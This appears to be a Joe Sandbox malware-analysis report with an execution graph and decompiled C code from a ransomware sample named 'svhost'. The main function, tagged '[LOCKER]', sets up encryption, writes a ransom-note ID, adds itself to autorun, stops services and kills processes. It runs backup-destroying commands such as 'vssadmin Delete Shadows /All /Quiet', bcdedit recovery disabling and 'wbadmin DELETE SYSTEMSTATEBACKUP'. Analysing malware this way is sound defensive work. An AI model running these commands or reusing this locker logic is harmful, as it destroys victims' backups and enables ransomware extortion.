                                      execution_graph 15499 e55c70 15608 ea4718 15499->15608 16049 eb192f 15608->16049 16070 eb1207 16049->16070 16069 eb1961 16069->16069 16100 eb13ec 16070->16100 16072 eb121d 16073 eb1221 16072->16073 16074 eb13ec std::_Lockit::_Lockit 5 API calls 16073->16074 16075 eb1237 16074->16075 16076 eb123b 16075->16076 16077 eb13ec std::_Lockit::_Lockit 5 API calls 16076->16077 16078 eb1251 16077->16078 16079 eb1255 16078->16079 16080 eb13ec std::_Lockit::_Lockit 5 API calls 16079->16080 16081 eb126b 16080->16081 16082 eb126f 16081->16082 16083 eb13ec std::_Lockit::_Lockit 5 API calls 16082->16083 16084 eb1285 16083->16084 16085 eb1289 16084->16085 16086 eb13ec std::_Lockit::_Lockit 5 API calls 16085->16086 16087 eb129f 16086->16087 16088 eb12a3 16087->16088 16089 eb13ec std::_Lockit::_Lockit 5 API calls 16088->16089 16090 eb12b9 16089->16090 16091 eb12bd 16090->16091 16092 eb13ec std::_Lockit::_Lockit 5 API calls 16091->16092 16093 eb12d3 16092->16093 16094 eb12f1 16093->16094 16095 eb13ec std::_Lockit::_Lockit 5 API calls 16094->16095 16096 eb1307 16095->16096 16097 eb12d7 16096->16097 16098 eb13ec std::_Lockit::_Lockit 5 API calls 16097->16098 16099 eb12ed 16098->16099 16099->16069 16101 eb141a 16100->16101 16102 eb1416 std::_Lockit::_Lockit 16100->16102 16101->16102 16106 eb1325 16101->16106 16102->16072 16105 eb1434 GetProcAddress 16105->16102 16107 eb1336 ___vcrt_FlsGetValue 16106->16107 16108 eb1354 LoadLibraryExW 16107->16108 16110 eb13ca FreeLibrary 16107->16110 16111 eb13e1 16107->16111 16112 eb13a2 LoadLibraryExW 16107->16112 16108->16107 16109 eb136f GetLastError 16108->16109 16109->16107 16110->16107 16111->16102 16111->16105 16112->16107 19170 e5c370 19171 e5c3b7 allocator 19170->19171 19174 e5d980 19171->19174 19175 e5d98c allocator 19174->19175 19178 e5e270 19175->19178 19179 e5e27c allocator 19178->19179 19182 e5e9a0 19179->19182 19183 e5e9ac allocator 19182->19183 19186 e528a0 19183->19186 19189 e52800 19186->19189 19190 e52819 19189->19190 19196 e5285c 19189->19196 19197 e89b55 EnterCriticalSection 19190->19197 19192 e52823 _Task_ptr 19192->19196 19202 e89e97 19192->19202 19198 e89b69 19197->19198 19199 e89b6e LeaveCriticalSection 19198->19199 19210 e89bdd 19198->19210 19199->19192 19215 e89e6a 19202->19215 19205 e89b0b EnterCriticalSection LeaveCriticalSection 19206 e89ba7 19205->19206 19207 e89bb2 RtlWakeAllConditionVariable 19206->19207 19208 e89bc3 SetEvent ResetEvent 19206->19208 19207->19196 19208->19196 19211 e89beb SleepConditionVariableCS 19210->19211 19212 e89c04 LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 19210->19212 19213 e89c28 19211->19213 19212->19213 19213->19198 19216 e89e79 19215->19216 19217 e89e80 19215->19217 19221 eadb56 19216->19221 19224 eadbc2 19217->19224 19220 e5284f 19220->19205 19222 eadbc2 std::_Cnd_initX 17 API calls 19221->19222 19223 eadb68 19222->19223 19223->19220 19227 ead8f8 19224->19227 19228 ead904 _Immortalize 19227->19228 19235 ea5b71 EnterCriticalSection 19228->19235 19230 ead912 19236 ead953 19230->19236 19232 ead91f 19246 ead947 19232->19246 19235->19230 19237 ead96f 19236->19237 19239 ead9e6 std::_Lockit::_Lockit 19236->19239 19238 ead9c6 19237->19238 19237->19239 19240 eb748b std::_Cnd_initX 17 API calls 19237->19240 19238->19239 19241 eb748b std::_Cnd_initX 17 API calls 19238->19241 19239->19232 19242 ead9bc 19240->19242 19243 ead9dc 19241->19243 19244 eb051f _free 14 API calls 19242->19244 19245 eb051f _free 14 API calls 19243->19245 19244->19238 19245->19239 19247 ea5bb9 std::_Lockit::~_Lockit LeaveCriticalSection 19246->19247 19248 ead930 19247->19248 19248->19220 18791 e633c0 18792 e633d1 Concurrency::details::ContextBase::GetWorkQueueIdentity 18791->18792 18793 e64950 28 API calls 18792->18793 18794 e633e8 std::runtime_error::runtime_error collate 18792->18794 18793->18794 19536 eb275f 19539 ea5bb9 LeaveCriticalSection 19536->19539 19538 eb2766 19539->19538 18795 e61e50 18796 e61e8c allocator 18795->18796 18798 e61e75 allocator 18795->18798 18797 e64440 28 API calls 18796->18797 18797->18798

                                      Executed Functions

                                      Function 00EA57A8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 577 ea57a8-ea57b5 call eb28e5 580 ea57d7-ea57e3 call ea57ea ExitProcess 577->580 581 ea57b7-ea57c5 GetPEB 577->581 581->580 582 ea57c7-ea57d1 GetCurrentProcess TerminateProcess 581->582 582->580
                                      C-Code - Quality: 100%
                                      			E00EA57A8(int _a4) {
				void* _t14;

				if(E00EB28E5(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00EA57EA(_t14, _a4);
				ExitProcess(_a4);
			}




                                      0x00ea57b5
                                      0x00ea57d1
                                      0x00ea57d1
                                      0x00ea57da
                                      0x00ea57e3

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,00EA57A7,00E62ABC,?,?,00E62ABC,?,00EBFCB0), ref: 00EA57CA
                                      • TerminateProcess.KERNEL32(00000000,?,00EA57A7,00E62ABC,?,?,00E62ABC,?,00EBFCB0), ref: 00EA57D1
                                      • ExitProcess.KERNEL32 ref: 00EA57E3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 13ba745442963ea8e46e4ad9189cb575ba5ec88f25d68d5b0791ea6ce44a41f7
                                      • Instruction ID: 2bc2685741e3cf3e1dd8eda6860e49c984e042a1896774292cab7dd2c3a6fe06
                                      • Opcode Fuzzy Hash: 13ba745442963ea8e46e4ad9189cb575ba5ec88f25d68d5b0791ea6ce44a41f7
                                      • Instruction Fuzzy Hash: DDE01232000608EFCF112B65DC5AE583BA8EF0A345B104425FA08AA571CA36E842CA40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E89C2B Relevance: 3.2, APIs: 2, Instructions: 157COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 597 e89c2b-e89c2e 598 e89c3d-e89c40 call ea49b4 597->598 600 e89c45-e89c48 598->600 601 e89c4a-e89c4b 600->601 602 e89c30-e89c3b call ead114 600->602 602->598 605 e89c4c-e89c50 602->605 606 e8a8a6-e8a8e3 call e8a88e call ea0c81 IsProcessorFeaturePresent 605->606 607 e89c56 605->607 612 e8a8e9-e8a95a 606->612 613 e8aa55-e8aa59 606->613 607->606 614 e8a95c-e8a969 612->614 615 e8a99f 612->615 617 e8a96b-e8a970 614->617 618 e8a98e-e8a99d 614->618 616 e8a9a5-e8a9af 615->616 619 e8a9b1-e8a9d6 616->619 620 e8a9e3 616->620 617->618 621 e8a972-e8a977 617->621 618->616 622 e8a9d8-e8a9e1 619->622 623 e8a9e6-e8a9ed 619->623 620->623 621->618 624 e8a979-e8a97e 621->624 622->623 623->613 625 e8a9ef-e8aa05 623->625 624->618 626 e8a980-e8a985 624->626 625->613 627 e8aa07-e8aa0c 625->627 626->618 628 e8a987-e8a98c 626->628 627->613 629 e8aa0e-e8aa25 627->629 628->615 628->618 629->613 630 e8aa27-e8aa41 629->630 630->613 631 e8aa43-e8aa50 630->631 631->613
                                      C-Code - Quality: 76%
                                      			E00E89C2B(signed char __edx, void* __eflags, intOrPtr _a4) {
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed char _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v64;
				char _v68;
				char _v84;
				void* _t62;
				signed int _t63;
				signed int _t67;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				intOrPtr _t86;
				signed int _t88;
				intOrPtr _t109;
				intOrPtr* _t111;
				signed char _t112;
				intOrPtr* _t114;
				signed char _t128;
				intOrPtr* _t130;
				signed int _t133;
				signed int _t136;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t159;

				_t128 = __edx;
				_t143 = _t153;
				while(1) {
					_push(_a4);
					_t62 = E00EA49B4(); // executed
					if(_t62 != 0) {
						break;
					}
					_t63 = E00EAD114(__eflags, _a4);
					__eflags = _t63;
					if(_t63 == 0) {
						__eflags = _a4 - 0xffffffff;
						if(_a4 == 0xffffffff) {
							_push(_t143);
							_t144 = _t153;
							E00E8A88E( &_v20);
							E00EA0C81( &_v20, 0xeec1b4);
							asm("int3");
							_push(_t144);
							 *0xef31ac =  *0xef31ac & 0x00000000;
							 *0xeef090 =  *0xeef090 | 1;
							_t67 = IsProcessorFeaturePresent(0xa);
							__eflags = _t67;
							if(_t67 != 0) {
								_v28 = _v28 & 0x00000000;
								 *0xeef090 =  *0xeef090 | 0x00000002;
								 *0xef31ac = 1;
								_t130 =  &_v48;
								_push(1);
								asm("cpuid");
								_pop(_t109);
								 *_t130 = 0;
								 *((intOrPtr*)(_t130 + 4)) = 1;
								 *((intOrPtr*)(_t130 + 8)) = 0;
								 *(_t130 + 0xc) = _t128;
								_v24 = _v48;
								_v20 = _v36 ^ 0x49656e69;
								_v16 = _v40 ^ 0x6c65746e;
								_push(1);
								asm("cpuid");
								_t111 =  &_v48;
								 *_t111 = 1;
								__eflags = _v16 | _v20 | _v44 ^ 0x756e6547;
								 *((intOrPtr*)(_t111 + 4)) = _t109;
								 *((intOrPtr*)(_t111 + 8)) = 0;
								 *(_t111 + 0xc) = _t128;
								if((_v16 | _v20 | _v44 ^ 0x756e6547) != 0) {
									L21:
									_t133 =  *0xef31b0; // 0x2
								} else {
									_t88 = _v48 & 0x0fff3ff0;
									__eflags = _t88 - 0x106c0;
									if(_t88 == 0x106c0) {
										L20:
										_t136 =  *0xef31b0; // 0x2
										_t133 = _t136 | 0x00000001;
										 *0xef31b0 = _t133;
									} else {
										__eflags = _t88 - 0x20660;
										if(_t88 == 0x20660) {
											goto L20;
										} else {
											__eflags = _t88 - 0x20670;
											if(_t88 == 0x20670) {
												goto L20;
											} else {
												__eflags = _t88 - 0x30650;
												if(_t88 == 0x30650) {
													goto L20;
												} else {
													__eflags = _t88 - 0x30660;
													if(_t88 == 0x30660) {
														goto L20;
													} else {
														__eflags = _t88 - 0x30670;
														if(_t88 != 0x30670) {
															goto L21;
														} else {
															goto L20;
														}
													}
												}
											}
										}
									}
								}
								__eflags = _v24 - 7;
								_t80 = _v40;
								_v16 = _t80;
								if(_v24 < 7) {
									_t112 = _v28;
								} else {
									_t86 = 7;
									_push(_t111);
									asm("cpuid");
									_t114 =  &_v48;
									 *_t114 = _t86;
									_t80 = _v16;
									 *((intOrPtr*)(_t114 + 4)) = _t111;
									 *((intOrPtr*)(_t114 + 8)) = 0;
									 *(_t114 + 0xc) = _t128;
									_t112 = _v44;
									__eflags = _t112 & 0x00000200;
									if((_t112 & 0x00000200) != 0) {
										 *0xef31b0 = _t133 | 0x00000002;
									}
								}
								__eflags = _t80 & 0x00100000;
								if((_t80 & 0x00100000) != 0) {
									 *0xeef090 =  *0xeef090 | 0x00000004;
									 *0xef31ac = 2;
									__eflags = _t80 & 0x08000000;
									if((_t80 & 0x08000000) != 0) {
										__eflags = _t80 & 0x10000000;
										if((_t80 & 0x10000000) != 0) {
											asm("xgetbv");
											_v32 = _t80;
											_v28 = _t128;
											__eflags = (_v32 & 0x00000006) - 6;
											if((_v32 & 0x00000006) == 6) {
												_t83 =  *0xeef090; // 0x2f
												_t84 = _t83 | 0x00000008;
												 *0xef31ac = 3;
												 *0xeef090 = _t84;
												__eflags = _t112 & 0x00000020;
												if((_t112 & 0x00000020) != 0) {
													_t85 = _t84 | 0x00000020;
													__eflags = _t85;
													 *0xef31ac = 5;
													 *0xeef090 = _t85;
												}
											}
										}
									}
								}
							}
							__eflags = 0;
							return 0;
						} else {
							_push(_t143);
							_t147 = _t153;
							_t157 = _t153 - 0xc;
							E00E71189( &_v20);
							E00EA0C81( &_v20, 0xeeabf0);
							asm("int3");
							_push(_t147);
							_t148 = _t157;
							_t158 = _t157 - 0xc;
							E00E726C8( &_v36);
							E00EA0C81( &_v36, 0xeeae8c);
							asm("int3");
							_push(_t148);
							_t149 = _t158;
							_t159 = _t158 - 0xc;
							E00E7272E( &_v52, _v32);
							E00EA0C81( &_v52, 0xeeae14);
							asm("int3");
							_push(_t149);
							_t150 = _t159;
							E00E72768( &_v68, _v48);
							E00EA0C81( &_v68, 0xeeae50);
							asm("int3");
							_push(_t150);
							E00E51AE0( &_v84, _v64);
							E00EA0C81( &_v84, 0xeeda64);
							asm("int3");
							return "bad function call";
						}
					} else {
						continue;
					}
					L33:
				}
				return _t62;
				goto L33;
			}











































                                      0x00e89c2b
                                      0x00e89c2c
                                      0x00e89c3d
                                      0x00e89c3d
                                      0x00e89c40
                                      0x00e89c48
                                      0x00000000
                                      0x00000000
                                      0x00e89c33
                                      0x00e89c39
                                      0x00e89c3b
                                      0x00e89c4c
                                      0x00e89c50
                                      0x00e8a8a6
                                      0x00e8a8a7
                                      0x00e8a8af
                                      0x00e8a8bd
                                      0x00e8a8c2
                                      0x00e8a8c3
                                      0x00e8a8c6
                                      0x00e8a8d4
                                      0x00e8a8dc
                                      0x00e8a8e1
                                      0x00e8a8e3
                                      0x00e8a8e9
                                      0x00e8a8ef
                                      0x00e8a8fa
                                      0x00e8a900
                                      0x00e8a903
                                      0x00e8a904
                                      0x00e8a908
                                      0x00e8a909
                                      0x00e8a90b
                                      0x00e8a90e
                                      0x00e8a913
                                      0x00e8a91c
                                      0x00e8a92d
                                      0x00e8a938
                                      0x00e8a93e
                                      0x00e8a93f
                                      0x00e8a944
                                      0x00e8a947
                                      0x00e8a94f
                                      0x00e8a951
                                      0x00e8a954
                                      0x00e8a957
                                      0x00e8a95a
                                      0x00e8a99f
                                      0x00e8a99f
                                      0x00e8a95c
                                      0x00e8a95f
                                      0x00e8a964
                                      0x00e8a969
                                      0x00e8a98e
                                      0x00e8a98e
                                      0x00e8a994
                                      0x00e8a997
                                      0x00e8a96b
                                      0x00e8a96b
                                      0x00e8a970
                                      0x00000000
                                      0x00e8a972
                                      0x00e8a972
                                      0x00e8a977
                                      0x00000000
                                      0x00e8a979
                                      0x00e8a979
                                      0x00e8a97e
                                      0x00000000
                                      0x00e8a980
                                      0x00e8a980
                                      0x00e8a985
                                      0x00000000
                                      0x00e8a987
                                      0x00e8a987
                                      0x00e8a98c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00e8a98c
                                      0x00e8a985
                                      0x00e8a97e
                                      0x00e8a977
                                      0x00e8a970
                                      0x00e8a969
                                      0x00e8a9a5
                                      0x00e8a9a9
                                      0x00e8a9ac
                                      0x00e8a9af
                                      0x00e8a9e3
                                      0x00e8a9b1
                                      0x00e8a9b3
                                      0x00e8a9b6
                                      0x00e8a9b7
                                      0x00e8a9bc
                                      0x00e8a9bf
                                      0x00e8a9c1
                                      0x00e8a9c4
                                      0x00e8a9c7
                                      0x00e8a9ca
                                      0x00e8a9cd
                                      0x00e8a9d0
                                      0x00e8a9d6
                                      0x00e8a9db
                                      0x00e8a9db
                                      0x00e8a9d6
                                      0x00e8a9e8
                                      0x00e8a9ed
                                      0x00e8a9ef
                                      0x00e8a9f6
                                      0x00e8aa00
                                      0x00e8aa05
                                      0x00e8aa07
                                      0x00e8aa0c
                                      0x00e8aa10
                                      0x00e8aa13
                                      0x00e8aa16
                                      0x00e8aa22
                                      0x00e8aa25
                                      0x00e8aa27
                                      0x00e8aa2c
                                      0x00e8aa2f
                                      0x00e8aa39
                                      0x00e8aa3e
                                      0x00e8aa41
                                      0x00e8aa43
                                      0x00e8aa43
                                      0x00e8aa46
                                      0x00e8aa50
                                      0x00e8aa50
                                      0x00e8aa41
                                      0x00e8aa25
                                      0x00e8aa0c
                                      0x00e8aa05
                                      0x00e8a9ed
                                      0x00e8aa55
                                      0x00e8aa59
                                      0x00e89c56
                                      0x00e72787
                                      0x00e72788
                                      0x00e7278a
                                      0x00e72790
                                      0x00e7279e
                                      0x00e727a3
                                      0x00e727a4
                                      0x00e727a5
                                      0x00e727a7
                                      0x00e727ad
                                      0x00e727bb
                                      0x00e727c0
                                      0x00e727c1
                                      0x00e727c2
                                      0x00e727c4
                                      0x00e727cd
                                      0x00e727db
                                      0x00e727e0
                                      0x00e727e1
                                      0x00e727e2
                                      0x00e727ed
                                      0x00e727fb
                                      0x00e72800
                                      0x00e72801
                                      0x00e7280d
                                      0x00e7281b
                                      0x00e72820
                                      0x00e72826
                                      0x00e72826
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00e89c3b
                                      0x00e89c4b
                                      0x00000000

                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E8A8BD
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E8A8DC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8FeaturePresentProcessorThrow
                                      • String ID:
                                      • API String ID: 2073180564-0
                                      • Opcode ID: ffb41a00c5b0a8e30304f9a3aff056dd0a83d313322695b3075edb966d594997
                                      • Instruction ID: 4ae2480a7f599b71b5835981ae6a358b83f774b139efa07d39134f664d72b4d9
                                      • Opcode Fuzzy Hash: ffb41a00c5b0a8e30304f9a3aff056dd0a83d313322695b3075edb966d594997
                                      • Instruction Fuzzy Hash: DB5192719042099FEB18EFA9D9856AAB7F4FB84314F18917AD40DFB2A1E370DA04CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E55C70 Relevance: 70.5, APIs: 16, Strings: 24, Instructions: 492COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 e55c70-e55cf7 call ea4718 call e554b0 call e761d1 call e55540 * 2 call e51100 call e517b0 call e57cd0 17 e55cf8 call e55630 0->17 18 e55cfd-e55d1a call e57b40 17->18 21 e55d1c-e55d35 call e51100 call e517b0 18->21 22 e55d3a-e55d45 call e51100 call e70b80 18->22 31 e564f0-e564fd call e89a35 21->31 30 e55d4a-e55d5f call e70bb0 call e70ae0 22->30 38 e55d61-e55d6b 30->38 39 e55d6d 30->39 40 e55d77-e55de1 call e51100 call e517b0 call e55680 call e65480 call e51100 call e517b0 call e51100 call e51650 call e65500 38->40 39->40 59 e55e24-e55e7a call e51100 call e517b0 call e58000 call e65640 call e51650 call e62040 40->59 60 e55de3-e55e1f call e51100 call e517b0 call e524a0 call e654d0 call e516f0 40->60 83 e55e7c-e55e86 59->83 84 e55e88 59->84 60->31 85 e55e92-e55ebd call e57f50 * 2 83->85 84->85 90 e55f00-e55fcc call e51100 * 2 call e517b0 call e57cd0 call e62320 call e6f730 call e57b40 call e51100 call e517b0 call e51100 call e6c020 call e51100 call e517b0 call e51100 call e622e0 call e51be0 call e51bf0 85->90 91 e55ebf-e55efb call e51100 call e517b0 call e524a0 call e654d0 call e516f0 85->91 136 e55fdd-e55fe9 90->136 91->31 137 e56046-e5608f call e51100 call e517b0 call e62300 call e51be0 call e51bf0 136->137 138 e55feb-e5601f call e57de0 call e51650 call e6ed00 136->138 163 e560a0-e560ac 137->163 152 e56021-e56034 call e51650 call e6eed0 138->152 153 e56039-e56044 call e57b40 138->153 152->153 153->136 164 e560e5-e56107 163->164 165 e560ae-e560e3 call e57de0 call e51650 call e6ea80 call e57b40 163->165 168 e5610d-e56249 call e51100 call e517b0 * 3 call e57cd0 call e6e9a0 call e57b40 call e57cd0 call e6e9a0 call e57b40 call e57cd0 call e6e9a0 call e57b40 call e57cd0 call e6e9a0 call e57b40 call e57cd0 call e6e9a0 call e57b40 call e57cd0 call e6e9a0 call e57b40 164->168 169 e5624e-e562a6 call e6ea50 call e55820 call e51100 call e515c0 call e694e0 call e51100 call e515c0 call e566a0 call e51100 call e517b0 164->169 165->163 168->169 216 e562ab-e562ec call e515c0 call e66ba0 call e51be0 call e51bf0 169->216 234 e562fd-e56309 216->234 236 e563a1-e563e4 call e515c0 call e6d590 call e51be0 call e51bf0 234->236 237 e5630f-e5639c call e57de0 call e51100 call e517b0 * 3 call e51650 * 4 call e558e0 call e57b40 234->237 263 e563f5-e56401 236->263 237->234 266 e56461-e56493 call e51100 call e517b0 Sleep call e578b0 * 2 263->266 267 e56403-e5645f call e57de0 call e51650 * 4 call e558e0 call e57b40 263->267 266->216 267->263
                                      C-Code - Quality: 98%
                                      			E00E55C70(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v28;
				char _v40;
				char _v52;
				char _v76;
				char _v120;
				char _v144;
				char _v168;
				char _v192;
				char _v216;
				signed char _v217;
				signed int _v218;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				intOrPtr _v260;
				intOrPtr _v264;
				signed int _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				char _v324;
				char _v332;
				char _v356;
				char _v380;
				char _v404;
				char _v428;
				char _v452;
				char _v476;
				char _v500;
				char _v524;
				char _v548;
				char _v572;
				void* __ebp;
				signed int _t176;
				void* _t179;
				signed char _t187;
				void* _t201;
				void* _t208;
				signed char _t209;
				void* _t262;
				void* _t264;
				void* _t265;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t309;
				void* _t313;
				signed char _t314;
				void* _t317;
				signed int _t423;
				signed int _t454;
				signed int _t460;
				signed int _t484;
				signed int _t490;
				signed int _t494;
				void* _t495;
				void* _t498;
				void* _t499;
				void* _t500;
				void* _t501;
				void* _t513;

				_t513 = __fp0;
				_t510 = __eflags;
				_t493 = __esi;
				_t492 = __edi;
				_t335 = __ebx;
				_t176 =  *0xeef074; // 0x221cac15
				_v8 = _t176 ^ _t494;
				E00EA4718(0, 0xed24de);
				_t179 = E00E554B0(__ebx,  &_v332, __edi, __esi, __eflags, L"", 0x3f); // executed
				_push(_t179);
				_push( &_v324);
				E00E761D1();
				E00E55540( &_v324);
				E00E55540( &_v332);
				E00E517B0(E00E51100( &_v251), L"[LOCKER] Is running\n");
				E00E57CD0(_t335,  &_v356, _t492, _t493, _t510, L"{8761ABBD-7F85-42EE-B272-A76179687C63}");
				_t187 = E00E55630( &_v356);
				_t498 = _t495 + 0x14;
				_v217 = _t187;
				E00E57B40( &_v356);
				if((_v217 & 0x000000ff) == 0) {
					E00E51100( &_v10);
					E00E70B80(_t335,  &_v10, _t492, _t493, __eflags);
					E00E70BB0(_t335,  &_v10, _t492, _t493, __eflags);
					__eflags = E00E70AE0( &_v10) & 0x000000ff;
					if(__eflags == 0) {
						_v272 = L"[LOCKER] Priv: USER\n";
					} else {
						_v272 = L"[LOCKER] Priv: ADMIN\n";
					}
					_t19 =  &_v272; // 0xed2770
					_v308 =  *_t19;
					_t475 =  &_v308;
					E00E517B0(E00E51100( &_v253),  &_v308);
					E00E55680(_t335, _t492, _t493, __eflags);
					E00E65480( &_v120);
					E00E517B0(E00E51100( &_v254), L"[LOCKER] Init cryptor\n");
					_t201 = E00E51650(E00E51100(0xef3ac0));
					_t499 = _t498 + 4;
					__eflags = E00E65500(_t335,  &_v120, _t492, _t493, _t201) & 0x000000ff;
					if(__eflags != 0) {
						E00E517B0(E00E51100( &_v241), L"[LOCKER] Put ID to HTML-code\n");
						E00E58000(_t335,  &_v380, _t492, _t493, __eflags, "{{IDENTIFIER}}");
						_t208 = E00E51650(E00E65640( &_v572));
						_t500 = _t499 + 4;
						_t209 = E00E62040(_t335, 0xef3ac0, _t492, _t493,  &_v380, _t208);
						__eflags = _t209 & 0x000000ff;
						if((_t209 & 0x000000ff) != 0) {
							_v268 = 0;
						} else {
							_v268 = 1;
						}
						_v218 = _v268;
						E00E57F50( &_v572);
						E00E57F50( &_v380);
						_t475 = _v218 & 0x000000ff;
						__eflags = _v218 & 0x000000ff;
						if(__eflags == 0) {
							E00E51100( &_v14);
							E00E517B0(E00E51100( &_v243), L"[LOCKER] Add to autorun\n");
							E00E57CD0(_t335,  &_v404, _t492, _t493, __eflags, L"svhost");
							E00E6F730(_t335,  &_v14, _t475, _t492, _t493,  &_v404, E00E62320(0xef3ac0));
							E00E57B40( &_v404);
							E00E517B0(E00E51100( &_v244), L"[LOCKER] Scan hidden devices\n");
							E00E51100( &_v13);
							E00E6C020(_t335,  &_v13, _t492, _t493, __eflags);
							E00E517B0(E00E51100( &_v245), L"[LOCKER] Stop and delete services\n");
							E00E51100( &_v9);
							_v264 = E00E622E0(0xef3ac0);
							_v228 = E00E51BE0(_v264);
							_v284 = E00E51BF0(_v264);
							while(1) {
								__eflags = _v228 - _v284;
								if(__eflags == 0) {
									break;
								}
								E00E57DE0(_t335,  &_v144, _t492, _t493, __eflags, _v228);
								_t313 = E00E51650( &_v144);
								_t500 = _t500 + 4;
								_t314 = E00E6ED00(_t335,  &_v9, _t492, _t493, _t313, 0x3e8);
								__eflags = _t314 & 0x000000ff;
								if((_t314 & 0x000000ff) != 0) {
									_t317 = E00E51650( &_v144);
									_t500 = _t500 + 4;
									E00E6EED0( &_v9, _t317);
								}
								E00E57B40( &_v144);
								_t460 = _v228 + 0x18;
								__eflags = _t460;
								_v228 = _t460;
							}
							E00E517B0(E00E51100( &_v246), L"[LOCKER] Kill processes\n");
							_v260 = E00E62300(0xef3ac0);
							_v232 = E00E51BE0(_v260);
							_v288 = E00E51BF0(_v260);
							while(1) {
								__eflags = _v232 - _v288;
								if(__eflags == 0) {
									break;
								}
								E00E57DE0(_t335,  &_v192, _t492, _t493, __eflags, _v232);
								_t309 = E00E51650( &_v192);
								_t500 = _t500 + 4;
								E00E6EA80(_t335,  &_v9, _t492, _t493, _t309);
								_t235 = E00E57B40( &_v192);
								_t454 = _v232 + 0x18;
								__eflags = _t454;
								_v232 = _t454;
							}
							_v236 = 0;
							while(1) {
								__eflags = _v236 - 3;
								if(__eflags >= 0) {
									break;
								}
								_v292 = _v236 + 1;
								E00E517B0(E00E517B0(E00E517B0(E00E51100( &_v247), L"[LOCKER] Remove backups "),  &_v292), "\n");
								E00E57CD0(_t335,  &_v548, _t492, _t493, __eflags, L"vssadmin.exe Delete Shadows /All /Quiet");
								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v548);
								E00E57B40( &_v548);
								E00E57CD0(_t335,  &_v428, _t492, _t493, __eflags, L"bcdedit.exe /set {default} recoveryenabled No");
								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v428);
								E00E57B40( &_v428);
								E00E57CD0(_t335,  &_v452, _t492, _t493, __eflags, L"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures");
								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v452);
								E00E57B40( &_v452);
								E00E57CD0(_t335,  &_v476, _t492, _t493, __eflags, L"wbadmin DELETE SYSTEMSTATEBACKUP");
